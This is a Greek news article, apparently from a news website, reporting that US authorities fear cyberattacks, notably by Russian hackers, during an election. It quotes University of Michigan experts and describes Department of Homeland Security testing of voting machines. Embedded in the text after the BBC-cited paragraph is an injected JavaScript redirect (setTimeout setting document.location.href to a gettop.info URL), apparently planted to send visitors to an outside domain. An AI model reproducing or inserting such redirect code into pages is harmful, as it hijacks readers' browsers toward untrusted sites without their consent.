Σε επιφυλακή οι αμερικανικές Αρχές – Φοβούνται κυβερνοεπιθέσεις

0
2

 

Πλήγμα μέσω του διαδικτύου φοβούνται οι αμερικανικές αρχές ενώ η εκλογική διαδικασία είναι σε εξέλιξη.

Οι ειδήμονες ανησυχούν για κυβερνοεπίθεση από Ρώσους χάκερ.

«Εκτός εάν το ποσοστό των εκλογικών αποτελεσμάτων είναι εξαιρετικά κοντά, είναι απίθανο μια κυβερνο-επίθεση να έχει ως συνέπεια την ανακοίνωση του ονόματος του λάθος υποψηφίου», δήλωσαν ειδικοί σε θέματα ασφαλείας του Πανεπιστημίου του Μίσιγκαν.

Ωστόσο, και οι δύο υποστηρίζουν ότι πρέπει να ληφθεί πολύ σοβαρά ο κίνδυνος για μια πιθανή επίθεση από χάκερ.

Μέχρι και σήμερα, οπότε και θα διεξαχθεί η εκλογική διαδικασία, το υπουργείο Εσωτερικής Ασφάλειας των ΗΠΑ πραγματοποιεί δοκιμές στα συστήματα που χρησιμοποιούνται για την ψηφοφορία προκειμένου να διαπιστωθεί εάν υπάρχουν τρωτά σημεία. Αξιωματούχοι υποστηρίζουν ότι το σύστημα είναι αξιόπιστο, ωστόσο παραδέχονται ότι υπάρχουν αδυναμίες και για το λόγο αυτό ειδικοί σε θέματα κυβερνο-ασφάλειας θα είναι έτοιμοι να επέμβουν σε περίπτωση που παρατηρηθεί οποιαδήποτε ανωμαλία στην εκλογική διαδικασία.

Όπως αναφέρει στο δημοσίευμά του το BBC, το έργο των χάκερς, εφόσον θέλουν να πλήξουν τις εκλογές, δεν θα είναι και τόσο εύκολο αφού η ψηφοφορία γίνεται μέσω ηλεκτρονικών θαλάμων, η συντριπτική πλειοψηφία των οποίων δεν είναι συνδεδεμένοι στο Διαδίκτυο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here